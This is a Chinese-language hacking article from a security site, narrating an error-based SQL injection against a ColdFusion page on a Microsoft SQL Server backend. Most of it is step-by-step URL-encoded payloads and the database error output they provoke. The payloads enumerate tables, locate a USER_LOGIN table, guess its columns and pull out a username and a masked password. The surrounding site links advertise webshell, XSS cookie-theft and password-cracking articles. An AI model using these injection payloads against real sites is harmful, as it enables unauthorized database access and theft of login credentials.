首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
对cfm的一个攻击实例
来源:vfocus.net 作者:vfocus 发布时间:2004-07-12  

对cfm的一个攻击实例

好郁闷,快考试了,抽空上上网。到这个地址的时候,习惯性的看看他有没有安全漏洞
http://www.test.com/openaccess/index.cfm?ID=11
提交
http://www.test.com/openaccess/index.cfm?ID=11;
返回
Error Occurred While Processing Request
Error Diagnostic Information
ODBC Error Code = 37000 (Syntax error or access violation)


[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.


The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (72:1) to (72:47).


Date/Time: 06/05/04 13:37:57
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Remote Address: 61.178.21.189
Query String: ID=11;


其实cfm的攻击也和asp一样简单,看上面的返回信息,比asp的返回还详细。
不过好象对cfm很少有人写,所以就写出来了。上面是mssql的数据库,很多方法都可以用,
为了面向广大的菜鸟爱好者,这里就只说说怎么爆表吧。


对asp的跨cool大家都很熟悉了吧,那么,现在来cool一把cfm!!


提交:
and 0=(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)


郁闷,没返回我们期待的东西,他不给我,我就换方法要,再来。


提交:
and%201=(Select%20top%201%20name%20from(Select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)


返回:
Error Diagnostic Information
ODBC Error Code = 22005 (Error in assignment)


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ANALYST_MST' to a column of data type int.


The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (50:2) to (50:51).
。。。。。。
看到了吧,哈哈,小竹的这个语句就是猛啊!
现在就一个一个查吧,换掉top%201%20name中的1,从1开始,到6的时候,返回一个期待的东西
。。。。。。。
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USER_LOGIN' to a column of data type int.
。。。。。。。


看见USER_LOGIN表了吧?说不定就有密码在里面。
现在就看看里面有什么东西:(胜利就在眼前了,冲啊。。。)
提交:
and%201=(Select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects)
返回:
。。。。。
Microsoft][ODBC SQL Server Driver][SQL Server]Line 2: Incorrect syntax near 'USER_LOGIN'.
。。。。。
我倒!!怎么这样!吸根烟再说。干脆用猜吧,像
and 1=(select%20user_id%20from%20USER_LOGIN)
猜不出来再说了。。。


出来了,哈哈,user_id,
连续提交,得到几个字段
user_id user password,没办法啊,100%的猜中率。
好了,已经到了最后一步了,我们继续来啊!!


and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)


出来了,用户是kimeng,下面爆他的密码:


and%200=(select%20password%20from%20USER_LOGIN%20where%20password>1)


哈哈,出来了,不好意思,马赛克处理*****


随便写写,没什么技术活。


一个月前写的烂文,从牛族拿出来了...哎...



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·最后的战役--[第三次注入中国黑
·跨站式SQL注入
·动网论坛7.0获得WebShell的分析
·脚本图片类后门的完美使用方法实
·windows POSIX 子系统权限提升漏
·突破常规限制运行asp木马
·脚本后门的深入
·Advanced SQL Injection with My
·提升asp木马权限
·注入下载文件的代码到IE进程然后
·青创 ,爱你很难, 青创文章漏洞
·分析盛大被黑
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved